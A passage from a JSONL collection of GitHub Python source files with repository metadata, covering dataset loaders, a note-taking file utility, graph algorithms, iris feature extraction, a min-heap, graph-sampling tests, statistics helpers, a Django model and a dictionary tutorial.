boxlist)\n # return the image, the boxlist and the idx in your dataset\n return image, boxlist, index\n else:\n img_path, polys, texts = self.dataset.getitem(index)\n img = imread(img_path, mode=\"RGB\")\n aug_img, _, _ = self.augment(img)\n image = Image.fromarray(aug_img.astype(np.uint8)).convert('RGB')\n boxlist=None\n if self.transforms:\n image,_ = self.transforms(image, boxlist)\n # return the image, the boxlist and the idx in your dataset\n return image, None, index\n\n def get_img_info(self, index):\n if self.is_train:\n return {\"path\":\"none\", \"height\": 768, \"width\": 1280}\n path, _, _ = self.dataset.getitem(index)\n size = Image.open(path).size\n # size = [1280,768]\n return {\"path\":path, \"height\": size[1], \"width\": size[0]}","repo_name":"lanfeng4659/STR-TDSL","sub_path":"maskrcnn_benchmark/data/datasets/synthtext800k.py","file_name":"synthtext800k.py","file_ext":"py","file_size_in_byte":7902,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"31"} +{"seq_id":"41891785019","text":"\"\"\"\nThis file describes work with I/O\n\"\"\"\nimport os\n\n\ndef write_to_file(filename: str):\n \"\"\"\n Prompts user for input and writes that input to a file.\n \"\"\"\n text = input(\"\\nPlease enter a text you want to write to the file: \")\n with open(filename, 'w') as f:\n f.write(text)\n f.write('\\n')\n\n\ndef append_to_file(filename: str):\n \"\"\"\n Prompts user for input and appends that input to a file.\n \"\"\"\n text = input(\"\\nPlease enter the text you want to append to the file: \")\n with open(filename, 'a') as f:\n f.write(text)\n f.write('\\n')\n\n\ndef print_file(filename: str):\n \"\"\"\n Prints file content to console.\n \"\"\"\n with open(filename, 'r') as f:\n for line in f.readlines():\n print(line, end='')\n print()\n\n\ndef delete_file(filename: str):\n \"\"\"\n Deletes file.\n \"\"\"\n os.remove(filename)\n\n\ndef get_line_count(filename: str):\n \"\"\"\n Returns amount of lines in file.\n \"\"\"\n with open(filename) as f:\n i = -1\n for i, l in enumerate(f):\n pass\n return i + 1\n\n\ndef replace_in_file(filename: str):\n \"\"\"\n Prompts user to enter line number and text. Than replaces existing text on this line with new text.\n \"\"\"\n line_number = int(input(\"Please enter the line number you want to update: \"))\n\n actual_lines_in_file = get_line_count(filename)\n if line_number > actual_lines_in_file:\n print(f\"File contains only {actual_lines_in_file} line{'s' if actual_lines_in_file > 1 else ''}.\")\n return\n\n text = input(\"Please enter the text that should replace that line: \")\n\n new_content = []\n with open(filename, 'r') as f:\n for i, line in enumerate(f):\n if i + 1 == line_number:\n new_content.append(f'{text}\\n')\n else:\n new_content.append(line)\n\n with open(filename, 'w') as f:\n f.writelines(new_content)\n\n\ndef take_note():\n \"\"\"\n Main function.\n \"\"\"\n filename = input(\"Please enter filename: \")\n\n if os.path.isfile(filename):\n option = input(\"\\nA) Read the file\\n\"\n \"B) Delete the file and start over\\n\"\n \"C) Append the file\\n\"\n \"D) Replace a single line\\n\"\n \"Above are few options what you can do with this file. 
Please choose one: \").lower()\n\n if option == 'a':\n print_file(filename)\n elif option == 'b':\n delete_file(filename)\n write_to_file(filename)\n elif option == 'c':\n append_to_file(filename)\n elif option == 'd':\n replace_in_file(filename)\n else:\n print(\"NOT SUPPORTED OPTION\")\n else:\n write_to_file(filename)\n return\n\n\ntake_note()\n","repo_name":"Zirochkaa/Python-Is-Easy-Homeworks","sub_path":"homework_8_io/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5379145256","text":"import sys\n\n\nclass Solution:\n def findSum(self, A, N):\n maxi = -sys.maxsize\n mini = sys.maxsize\n for i in range(len(A)):\n maxi = max(maxi, A[i])\n mini = min(mini, A[i])\n return maxi+mini\n","repo_name":"Tanujarora100/Striver-A-Z-DSA-SHEET","sub_path":"Arrays/2-minimum_max_Array.py","file_name":"2-minimum_max_Array.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41846095279","text":"from exception import NomeNaoLocalizado\nclass grafo(object):\n def __init__(self,arestas):\n self.adj = {}\n self.arestas = arestas\n self.relacao_amigos = {}\n self.adiciona_arestas(arestas)\n\n def cria_aresta(self, chave, valor):\n\n if chave not in list(self.adj.keys()):\n self.adj[chave] = valor\n else:\n if valor not in self.adj[chave]:\n self.adj[chave].append(valor) \n\n\n def adiciona_arestas(self, arestas):\n\n for chave, valor in arestas.items():\n self.cria_aresta(chave, valor)\n\n def lista_amigos(self,pessoa):\n if pessoa in list(self.adj.keys()):\n listagem_amigos = self.adj[pessoa]\n else:\n raise NomeNaoLocalizado\n \n return listagem_amigos\n \n def lista_nivel2(self,pessoa):\n listagem_nivel2 = []\n for chave, valor in self.arestas.items():\n if pessoa not in self.arestas[chave] and pessoa != chave and pessoa in list(self.adj.keys()):\n listagem_nivel2.append(chave)\n if listagem_nivel2 == []:\n raise NomeNaoLocalizado('Não existe nomes a serem listados')\n else:\n return listagem_nivel2\n\n def listar_grafo(self):\n return list(self.adj.keys())\n \n def adicionar_amigo(self,pessoa,amigo):\n if amigo not in list(self.adj.keys()):\n raise NomeNaoLocalizado('Amigo não localizado !')\n else:\n self.adj[amigo].append(pessoa)\n return f'Nome Adicionado'\n\n def __str__(self):\n return f'Grafo({self.adj})'","repo_name":"kaueabarros/Desafio","sub_path":"api/backend/grafo.py","file_name":"grafo.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21989050504","text":"from collections import deque\n\ndef bridge(graph, n):\n global total\n total = 2\n\n def dfs(adj, up, down, parent, start):\n global total\n for v in adj[start]:\n if up[v] == -1: # is not visited\n up[v] = total\n down[v] = total\n total += 1\n dfs(adj, up, down, start, v)\n down[start] = min(down[start], down[v]) \n\n elif v != parent:\n down[start] = min(down[start], down[v]) \n\n up = [-1]*n\n down = [-1]*n\n\n up[0] = 1\n down[0] = 1\n dfs(graph, up, down, 0, 0)\n for i in range(1, n):\n if up[i] == down[i]:\n return True\n return False\n\n\ndef is_connected(graph, n): \n vis = set()\n Q = deque()\n Q.append(0)\n while Q:\n u = Q.popleft()\n if u in vis:\n continue\n vis.add(u)\n for v in graph[u]:\n if v not in vis:\n Q.append(v) \n return len(vis) == n\n\n'''Read input with generator instead of 
input(), much faster'''\nimport sys\nitr = (line for line in sys.stdin.read().split('\\n')) # buffer\ninp = lambda: next(itr) # next iter\ndef ni(): return int(inp())\ndef nl_2(): return list(inp())\ndef nl(): return [int(tok) for tok in inp().split()]\n\n''' find bridges in graph. I.e. removal of single edge will produce a disconnected graph '''\n\nwhile True:\n p, c = nl()\n if not p and not c: break\n\n graph = {i:list() for i in range(p)}\n for a, b in [nl() for _ in range(c)]:\n graph[a].append(b)\n graph[b].append(a) \n \n if not is_connected(graph, p) or bridge(graph, p):\n print(\"Yes\")\n else:\n print(\"No\")\n","repo_name":"fr3632ho/kattis","sub_path":"birthday-party/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16391878742","text":"import os \r\nimport cv2 \r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport numpy as np\r\nimport sklearn\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\r\nfrom sklearn.neighbors import NearestCentroid as NC\r\nfrom scipy import signal\r\nimport scipy\r\n# This implementation follows the formula given in the paper\r\n# and follows similar logic in wikipedia's python implementation\r\n# of gabor filter. See https://en.wikipedia.org/wiki/Gabor_filter\r\n# That is, the origin of a gabor filter matrix is set to be its center\r\n# The kernel size is set to (9,9) as suggested\r\ndef ROI(image):\r\n return image[0:48,:]\r\n\r\n\r\ndef newfilter(x, y, sigma_x, sigma_y,f):\r\n return (1/(2*(math.pi)*sigma_x*sigma_y))*math.exp(-0.5*(x**2/sigma_x**2 + y**2/sigma_y**2)) * M(x,y,f)\r\n \r\n \r\n \r\ndef M(x,y,f):\r\n # f is the frequency of sinusoidal function\r\n return math.cos(2*math.pi*f*math.sqrt(x**2 + y**2))\r\n\r\n\r\n# compute kernel apply convolution\r\ndef getKernel(sigma_x, sigma_y,f):\r\n kernel = np.zeros((9,9))\r\n for i in range(0,9):\r\n for j in range(0,9):\r\n kernel[i,j] = newfilter(i-4, j-4, sigma_x, sigma_y,f)\r\n return kernel\r\n\r\n \r\n \r\ndef getConvolution(img, sigma_x, sigma_y,f):\r\n roi = ROI(img)\r\n kernel = getKernel(sigma_x, sigma_y,f)\r\n return scipy.signal.convolve2d(roi, kernel, mode='same', boundary='wrap')\r\n\r\n\r\n# extract statistics from 8x8 block\r\ndef get_feature_vector(image, sigma_x, sigma_y,f):\r\n img = getConvolution(image, sigma_x, sigma_y,f)\r\n len_row = len(img)\r\n len_col = len(img[0])\r\n rows = len_row//8\r\n cols = len_col//8\r\n feature_vector=[]\r\n for r in range(0,rows):\r\n for c in range(0,cols):\r\n mean = np.mean(np.abs(img[8*r:8*(r+1), 8*c:8*(c+1)]))\r\n sd = np.mean(np.abs((np.abs(img[8*r:8*(r+1), 8*c:8*(c+1)]) - mean)))\r\n feature_vector.append(mean)\r\n feature_vector.append(sd)\r\n return feature_vector\r\n\r\n# extract featue vectors with two\r\n# set of sigmax and sigmay as described in the\r\n# paper and glue them to a length 1536 vector\r\n\r\ndef feature_extractor(train,test):\r\n trainf=[]\r\n testf=[]\r\n for i in range(len(train)):\r\n # f is set to 1/sigmax\r\n fvec1=get_feature_vector(train[i], 4.5, 1.5,1/4.5)\r\n fvec2=get_feature_vector(train[i], 3, 1.5,1/3)\r\n trainf.append(fvec1+fvec2)\r\n for j in range(len(test)):\r\n fvec1=get_feature_vector(test[j], 4.5, 1.5,1/4.5)\r\n fvec2=get_feature_vector(test[j], 3, 1.5,1/3)\r\n testf.append(fvec1+fvec2)\r\n return 
[np.array(trainf),np.array(testf)]\r\n","repo_name":"Ted5834314/Iris-Detection-Python","sub_path":"FeatureExtraction.py","file_name":"FeatureExtraction.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37591031851","text":"\"\"\" Implementation of a binary heap using list \"\"\"\n\nclass Binary_Min_Heap():\n\n \"\"\" Define constructor function, takes an array with values as an\n argument \"\"\"\n def __init__(self, alist = []):\n self.build_min_heap(alist)\n\n \"\"\" Build heap from an array \"\"\"\n def build_min_heap(self, alist):\n self.heap = [0 for i in range(len(alist) + 1)]\n self.size = len(alist)\n for i in range(1, len(alist) + 1):\n self.heap[i] = alist[i - 1]\n\n \"\"\" Starting from the last node that has a child, start heapifying \"\"\"\n for i in range(self.size // 2, 0, -1):\n self.min_heapify(i)\n\n \"\"\" min_heapify function to enforce the min-heap property on a particular\n\telement of a heap \"\"\"\n def min_heapify(self, i):\n left = 2 * i\n right = 2 * i + 1\n smallest = i\n if (right <= self.size and self.heap[smallest] > self.heap[right]):\n smallest = right\n if (left <= self.size and self.heap[smallest] > self.heap[left]):\n smallest = left\n if (smallest != i):\n self.swap(self.heap, i, smallest)\n self.min_heapify(smallest)\n\n \"\"\" Function to swap two values in an array; takes indices \"\"\"\n def swap(self, alist, i, j):\n tmp = alist[i]\n alist[i] = alist[j]\n alist[j] = tmp\n\n \"\"\" Function to delete minimum value from a heap \"\"\"\n def delete_min(self):\n if (self.size == 0):\n return (-float(\"inf\"))\n x = self.heap[1]\n self.heap[1] = self.heap[self.size]\n self.size -= 1\n self.min_heapify(1)\n return x\n\n \"\"\" Heap Sort \"\"\"\n def heap_sort(self):\n out = [0 for i in range(self.size)]\n for i in range(self.size):\n out[i] = self.delete_min()\n\n \"\"\" Build heap again because we destroyed it above \"\"\"\n self.build_min_heap(out)\n return out\n\n\"\"\" ***********************************************************************\"\"\"\n\n\n\"\"\" A tester function \"\"\"\ndef tester():\n alist = [4, 2, 1, 5]\n h = Binary_Min_Heap(alist)\n print(h.heap_sort())\n print(h.heap_sort())\n alist = [0, 2, 1, 5, 1]\n h = Binary_Min_Heap(alist)\n print(h.heap_sort())\n\n\"\"\" Call the tester function \"\"\"\ntester()\n","repo_name":"goelhardik/programming","sub_path":"binary_heap/binary_min_heap.py","file_name":"binary_min_heap.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"656261227","text":"import tensorflow as tf\n\nIMG_WIDTH = 256\nIMG_HEIGHT = 256\nEPOCHS = 10\nBATCH_SIZE = 1\nDATA_ROOT_DIR = \"./Datasets/\"\nMODEL_FOLDER = \"summer2winter_yosemite/\"\nSAVED_MODEL_DIR = \"./Saved_Model/\"\nOUTPUT_DIR = \"./Outputs/\"\nSAVE_MODEL = True\nLOAD_MODEL = False\nLEARNING_RATE = 2e-4\nCYCLE_LOSS_WEIGHT = 10.0\nID_LOSS_WEIGHT = 0.0\n\n","repo_name":"ShuiFanZZ/CycleGAN","sub_path":"Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19987252039","text":"import os\nos.system(\"clear\")\n\nfrom GasolineVehicle import GasolineVehicle\nfrom HybridVehicle import HybridVehicle\n\nyarisAttributes = {}\nyarisAttributes[\"vin\"] = \"YARIS123000000\"\nyarisAttributes[\"wheels\"] = 4\nyarisAttributes[\"doors\"] = 
4\nyarisAttributes[\"seats\"] = 4\n\ntandcAttributes = {}\ntandcAttributes[\"vin\"] = \"CHRYSLER123000\"\ntandcAttributes[\"wheels\"] = 4\ntandcAttributes[\"doors\"] = 4\ntandcAttributes[\"seats\"] = 7\n\npriusAttributes = {}\npriusAttributes[\"vin\"] = \"PRIUS123000000\"\npriusAttributes[\"wheels\"] = 4\npriusAttributes[\"doors\"] = 4\npriusAttributes[\"seats\"] = 5\npriusBattery = 2.4\n\nyaris = GasolineVehicle(yarisAttributes)\nprius = HybridVehicle(priusAttributes, priusBattery)\nchrysler = GasolineVehicle(tandcAttributes)\n\nprint(yaris.getVehicleStatus())\nprint()\nprint(prius.getVehicleStatus())\nprint()\nprint(chrysler.getVehicleStatus())\n\nchrysler.turn(\"left\")\nprint(chrysler.getVehicleStatus())\nchrysler.turn(\"straight\")\nprint(chrysler.getVehicleStatus())\n","repo_name":"ampise/python","sub_path":"OOP/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38277786073","text":"\"\"\"Testing functionality of the ergmpy package\"\"\"\n\nimport numpy as np\nfrom ergmpy import ergm\nimport networkx as nx\nimport time\nfrom scipy.special import binom\n\nprint(\"Testing ergmpy\")\n\np = 0.34 # parameter for ER random graphs\n\nn_nodes = 6\nn_samples = 10000\nseed = 1717\n\nprint(\"Using Networkx to sample undirected Erdos-Renyi random graphs with edge probability p = {}\".format(p))\nprint(\"Producing {} samples with {} nodes\".format(n_samples, n_nodes))\nprint(\"Using seed {}\".format(seed))\n\nnx_ER_start = time.time()\nnx_ER_list = [nx.gnp_random_graph(n_nodes,p) for k in range(n_samples)]\nnx_ER_end = time.time()\n\nprint(\"Elapsed time: {} s\".format(nx_ER_end - nx_ER_start))\nprint(\"Produced {} samples\".format(len(nx_ER_list)))\n\n\nprint(\"Now using ergmpy gibbs sampler ergm.sample_binary, same parameters\")\n\nergm_ER_start = time.time()\nergm_ER_model = ergm.ergm([np.sum],[np.log(p / (1-p))], False)\nergm_ER_samples = ergm_ER_model.sample_binary(n_nodes, n_samples)\nergm_ER_end = time.time()\n\nprint(\"Elapsed time: {} s\".format(ergm_ER_end - ergm_ER_start))\n\nergm_ER_list = [nx.from_numpy_array(ergm_ER_samples[:,:,i]) for i in range(n_samples)]\n\nprint(\"Produced {} samples\".format(len(ergm_ER_list)))\n\nprint(\"Comparing distribution of edge counts:\")\n\nm = int(binom(n_nodes, 2)) # should be 15.\nnx_edge_distro = [0.] * (m + 1) # There are between 0 and 15 (inclusive) edges in each graph\nergm_edge_distro = [0.] 
* (m + 1)\n\ntheory_edge_distro = [binom(m,k) * (p ** k) * ((1 - p) ** (m - k)) for k in range(m+1)]\nfor (G_nx, G_ergm) in zip(nx_ER_list, ergm_ER_list):\n nx_edge_distro[nx.number_of_edges(G_nx)] = nx_edge_distro[nx.number_of_edges(G_nx)] + 1 / n_samples\n ergm_edge_distro[nx.number_of_edges(G_ergm)] = ergm_edge_distro[nx.number_of_edges(G_ergm)] + 1 / n_samples\n\n# nx_edge_distro = [d / sum(nx_edge_distro) for d in nx_edge_distro]\n# ergm_edge_distro = [d / sum(ergm_edge_distro) for d in ergm_edge_distro]\n\nprint(\"{:>2} {:20} {:20} {:20}\".format(\"m\", \"nx prob.\", \"ergm prob.\", \"theory prob.\"))\nfor d in range(m + 1):\n print(f\"{d:2d} {nx_edge_distro[d]:20.14f} {ergm_edge_distro[d]:20.14f} {theory_edge_distro[d]:20.14f}\")\n\nn_large = 100\np_small = 0.17\nn_samples = 1000\nprint(\"Now attempting {} samples from n = {} nodes, p = {}\".format(n_samples, n_large, p_small))\n\nnx_ER_large_start = time.time()\nnx_ER_large_list = [nx.gnp_random_graph(n_large, p_small) for k in range(n_samples)]\nnx_ER_large_end = time.time()\nnx_ER_large_time = nx_ER_large_end - nx_ER_large_start\nprint(\"nx.gnp_random_graph took {} s\".format(nx_ER_large_time))\n\nnx_fastER_start = time.time()\nnx_fastER_list = [nx.fast_gnp_random_graph(n_large, p_small) for k in range(n_samples)]\nnx_fastER_end = time.time()\nnx_fastER_time = nx_fastER_end - nx_fastER_start\nprint(\"nx.fast_gnp_random_graph took {} s\".format(nx_fastER_time))\n\nergm_ER_large_start = time.time()\nergm_ER_large_model = ergm.ergm([np.sum], [np.log(p_small / (1-p_small))], directed=False)\n# ergm_ER_large_samples = ergm_ER_large_model.sample_binary(n_large,n_samples, burn_in=5*n_large, n_steps=2*n_large)\nergm_ER_large_samples = ergm_ER_large_model.sample_binary(n_large,n_samples)\nergm_ER_large_end = time.time()\nergm_ER_large_time = ergm_ER_large_end - ergm_ER_large_start\n# print(\"ergm.sample_binary took {} s with {} burnin steps and {} steps between samples\".format(ergm_ER_large_time, 5*n_large, 2*n_large))\nprint(\"ergm.sample_binary took {} s with default burn-in and steps\".format(ergm_ER_large_time))\n\nnx_ER_avg = sum([nx.number_of_edges(G) for G in nx_ER_large_list]) / n_samples\nnx_ER_fast_avg = sum([nx.number_of_edges(G) for G in nx_fastER_list]) / n_samples\nergm_ER_large_avg = sum([np.sum(ergm_ER_large_samples[:,:,k]) for k in range(n_samples)]) / n_samples\ntheory_avg = binom(n_large, 2) * p_small\n\nprint(\"Avg # of edges\")\n# print(f\"{'theory',:20}{'nx.gnp':20}{'nx.fast_gnp':20}{'ergm':20}\")\nprint(\"theory/nx.gnp/nx.fast_gnp/ergm\")\nprint(f\"{theory_avg:20.10f} {nx_ER_avg:20.10f} {nx_ER_fast_avg:20.10f} {ergm_ER_large_avg:20.10f}\")","repo_name":"celiibrendan/nx_graph_utils","sub_path":"ergmpy/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"44802902930","text":"import numpy as np\r\n\r\ndef descriptives_stats(donnee):\r\n \"\"\"\r\n Produit les statistiques descriptives a partir d'une array numpy 1D\r\n \"\"\"\r\n print(\"le nombre de donnees est de :\", len(donnee))\r\n print(\"la valeur maximale est de :\", np.max(donnee))\r\n print(\"la valeur minimale est de :\", np.min(donnee))\r\n print(\"la moyenne des donnees est de :\" , np.mean(donnee))\r\n print(\"la mediane des donnees est de :\" , np.median(donnee))\r\n print(\"l ecart-type des donnees est de :\" , np.std(donnee))\r\n first_quant = np.quantile(donnee, 0.25)\r\n print(\"le premier quantile est de :\" , 
first_quant)\r\n third_quant = np.quantile(donnee, 0.75)\r\n print(\"le troisieme quantile est de :\", third_quant)\r\n iqr = third_quant - first_quant\r\n print(\"l ecart interquartile est de :\", iqr)\r\n return first_quant, third_quant, iqr\r\n\r\ndef detect_outliers_iqr(donnee):\r\n \"\"\"\r\n Extrait les outliers a partir d'une array numpy 1D\r\n \"\"\"\r\n first_quant , third_quant, iqr = descriptives_stats(donnee)\r\n\r\n lower_bound = first_quant - 1.5 * iqr\r\n upper_bound = third_quant + 1.5 * iqr\r\n\r\n outliers = donnee[( donnee < lower_bound ) | (donnee > upper_bound)]\r\n\r\n ind_outliers = np.where((( donnee < lower_bound ) | (donnee > upper_bound)))\r\n\r\n data_without_outliers = donnee[( donnee >= lower_bound ) & (donnee <= upper_bound)]\r\n\r\n return outliers, data_without_outliers, ind_outliers","repo_name":"EcliaLamer/scripts_stage","sub_path":"scripts_python/fonctions_stats.py","file_name":"fonctions_stats.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2835763619","text":"import sys, os\nfrom CustomRowParser import get_formatted_row\nfrom config import allowed_quotes\nfrom config import delimiter\n#\n#\n# Pass this fileloader an absolute filepath and it will create a Hashmap of our values, stored as a list in memory\n#\n# It will validate the model which assumes we have 5 rows with the type\n# ID date-time string1 string2 string3\n#\n# Delimiter is space, and to quote strings with space we encapsulate them in before and after curly quotes “ ”, but we can tweak these in the config.py\n#\n#\n# It will then prompt the user to enter in valid IDs to list the values of st2 in the order they are in the file\n#\n#\n#\n#\n\n\n\n\n\n\n#\n#\n# Main Method\n#\n#\n\ndef main():\n\n # Memory object\n mem_obj = {}\n\n\n # make sure the filepath works\n try:\n assert os.path.exists(sys.argv[1])\n except:\n print(\"Enter in a valid Path to a file\")\n print(\"E.G. python3 fileloader.py \")\n sys.exit(1)\n filepath = sys.argv[1]\n file = open(filepath, 'r')\n\n\n # Read and process the file into memory\n print(\"Attempting to Load file %s....\" % filepath )\n bad_num_rows = 0\n for row in file:\n bad_num_rows += process_row(mem_obj, row)\n print(\"File loaded to memory!!\\n\")\n print(\"Ignored %i Rows due to Errors\" % bad_num_rows)\n file.close()\n\n\n # Begin User prompt\n current_response = ''\n while 'quit' not in current_response:\n if current_response:\n ids = current_response.split(',')\n for id in ids:\n id = id.strip()\n if id.isdigit(): ## remember this is true for only non negative integers\n get_entry(mem_obj,int(id))\n elif id =='':\n print(\"ERROR: Entry is Blank!! 
must be a non-negative Integer\")\n else:\n print(\"ERROR: Invalid entry for %s must be a non-negative Integer\" % id)\n\n current_response = input(\"\\nPlease enter IDs comma seperated: \")\n current_response = current_response.strip().lower()\n\n\n\n\n\n\n\n\n\n#\n#\n# Processing row functions\n#\n#\n\n\n# check to make sure we have a 5 row object with int as 1, date-time 2 and\ndef is_valid_row(parsed_row):\n\n if len(parsed_row) != 5:\n return False\n else:\n id = parsed_row[0]\n if id.isdigit(): # this also is invalid if its a negative number\n return True\n return False\n\n# returns 0 if no errors on row, returns 1 if error\ndef process_row(mem_obj, row):\n\n parsed_row = parse_row(row)\n\n if is_valid_row(parsed_row):\n add_entry(mem_obj, parsed_row)\n return 0\n else:\n return 1\n\n# this reads the rows, valid\ndef parse_row(row):\n\n #first check if there are curly braces or quotes, if not then lets just try to split it on spaces\n\n quotes_in_row = False\n for item in allowed_quotes:\n if item in row:\n quotes_in_row = True\n\n if quotes_in_row:\n split_row = get_formatted_row(row)\n else:\n split_row = row.split(delimiter)\n\n return split_row\n\n\n\n\n\n\n\n\n\n\n\n\n\n#\n#\n# Memory Object functions\n#\n#\n\n\n\n\n\n# this adds the values we want to the memory lookup object\ndef add_entry(mem_obj, row):\n id, stored_str = int(row[0]), row[3]\n if id in mem_obj.keys():\n mem_obj[id].append(stored_str)\n else:\n mem_obj[id] = [stored_str]\n# this prints the values of a given ID to the screen\ndef get_entry(mem_obj, id):\n try:\n data =mem_obj[id]\n for item in data:\n print('%s %s' % (id, item))\n except:\n print(\"ERROR: id %s does not exist\" % id)\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"mattown/edmodo","sub_path":"fileloader.py","file_name":"fileloader.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13948533082","text":"import sys\nsys.path.append(\"B:\\\\MyGit\\\\CryptoCoin\\\\solution\")\nfrom solution.Repository.OriginalDataSet.DataSet import DataSet\nfrom solution.DatSet.DataProcessor import DataProcessor\nfrom solution.Mediator.Mediator import ComputedAndDataMediator\nimport pandas as pd\nimport unittest\nfrom unittest import TestCase\nfrom unittest.mock import MagicMock\n\n\nclass DataSetUnitTests(TestCase):\n\n def setUp(self):\n self.dataProcessor = DataProcessor()\n self.filepath = '..\\\\asset\\\\3daysCoinBase.csv'\n self.df = pd.read_csv(self.filepath)\n self.mediator = ComputedAndDataMediator()\n self.sut = DataSet(self.dataProcessor, self.mediator)\n\n def test_DataSet_Integrity(self):\n mock_mediator_send= MagicMock(name='send', return_value = None)\n self.mediator.send = mock_mediator_send\n mock_processor_process = MagicMock(name = 'process', return_value = self.df)\n self.dataProcessor.process = mock_processor_process\n\n self.sut.consume(self.df)\n\n self.assertEqual(self.sut.getSize(), self.df.shape[0])\n for x,y in zip(self.sut.getColumnNames(), self.df.keys()):\n self.assertEqual(x,y)\n\n mock_mediator_send.assert_called_once()\n mock_processor_process.assert_called_once()\n\n def test_dataSet_Read(self):\n\n mock_processor_process = MagicMock(name='process', return_value=self.df)\n self.dataProcessor.process = mock_processor_process\n\n self.sut.consume(self.df)\n data = self.sut.readPartial('price')\n\n self.assertEqual(data.size,self.df.price.size)\n mock_processor_process.assert_called_once()\n\n def 
test_dataset_registerComputedColumn_Method(self):\n test = 'TEST1'\n self.sut.registerComputedColumn(test)\n self.assertEqual(True, test in self.sut.getComputedKeys())\n\n def test_check_consume_state_isCorrect(self):\n\n self.assertEqual(self.sut.isReadyToConsume(), True)\n self.sut.consume(self.df)\n self.assertEqual(self.sut.isReadyToConsume(), True)\n\n\n\n\nif __name__ == \"__main__\":\n unittest.main()\n \n\n\n","repo_name":"RickMu/CryptoDataArchitecture","sub_path":"unit_test/DataSetTests.py","file_name":"DataSetTests.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19202694789","text":"from . import measure\n# from ..p_utils import get_layer_metric_array\nimport torch.nn as nn\n\n\ndef get_layer_metric_array(net, metric, mode): \n metric_array = []\n\n for layer in net.modules():\n if mode=='channel' and hasattr(layer,'dont_ch_prune'):\n continue\n if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear):\n metric_array.append(metric(layer))\n \n return metric_array\n\n\n\n@measure('l2_norm', copy_net=False, mode='param')\ndef get_l2_norm_array(net, inputs, targets, mode, split_data=1, space='cv'):\n return get_layer_metric_array(net, lambda l: l.weight.norm(), mode=mode)\n","repo_name":"SLDGroup/survey-zero-shot-nas","sub_path":"measures/l2_norm.py","file_name":"l2_norm.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"31"} +{"seq_id":"18233864313","text":"from django.db import models\n\nclass Post(models.Model):\n user = models.ForeignKey('user.User', on_delete=models.RESTRICT)\n subject = models.CharField(max_length=200)\n content = models.TextField()\n image = models.ImageField()\n added_at = models.DateTimeField(auto_now_add=True)\n update_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n verbose_name = 'Post'\n verbose_name_plural = 'Postlar'\n index_together = (\n ('user', 'added_at'),\n ('added_at',)\n )\n\n","repo_name":"erkin7333/pyfull","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26192608769","text":"\"\"\"\n Python数据容器:字典的常用操作\n ① 新增元素:字典[\"key\"]=value,原字典有当前key则进行修改value,没有则添加新的key和value\n ② 更新元素:字典[\"key\"]=value,对字典中原有的key进行修改\n ③ 删除元素:字典.pop(key),返回指定key的value,同时字典被修改,指定的key的数据被删除\n ④ 清空元素:字典.clear(),字典被修改,元素被清空\n\"\"\"\n# # 一、新增元素:字典[\"key\"]=value\n# my_dict = {\"小樱\": 73, \"王小明\": 80, \"知世\": 92}\n# my_dict[\"艾利欧\"] = 98 # 在字典中新增一个没有的key-value值\n# print(f\"新增元素后的结果为:{my_dict}\")\n\n# # 二、更新元素:字典[\"key\"]=value\n# my_dict = {\"小樱\": 73, \"王小明\": 80, \"知世\": 92}\n# my_dict[\"知世\"] = 85 # 修改字典内已有元素的value值\n# print(f\"修改小樱成绩后的结果为:{my_dict}\")\n\n# # 三、删除元素:del 字典[\"管家仔\"] / 字典.pop(key)\n# my_dict = {\"小樱\": 73, \"王小明\": 80, \"知世\": 92, \"管家仔\": 80, \"路人\": 33}\n# del my_dict[\"管家仔\"] # 删除字典内的某个元素\n# print(f\"删除字典中“管家仔”后的结果为:{my_dict}\")\n# ele = my_dict.pop(\"路人\") # 删除字典内的某个元素\n# print(f\"删除字典中 “路人” 后的结果为:{my_dict}\")\n\n# # 四、清空元素:字典.clear()\n# my_dict = {\"小樱\": 73, \"王小明\": 80, \"知世\": 92}\n# my_dict.clear() # 清除字典中所有的元素\n# print(f\"清除my_dict字典中所有元素后的结果为:{my_dict}\")\n\n# # 五、获取全部的key:字典.keys()\n# my_dict = {\"小樱\": 73, \"王小明\": 80, \"知世\": 92}\n# key_list = my_dict.keys() # 拿到字典中所有的key\n# 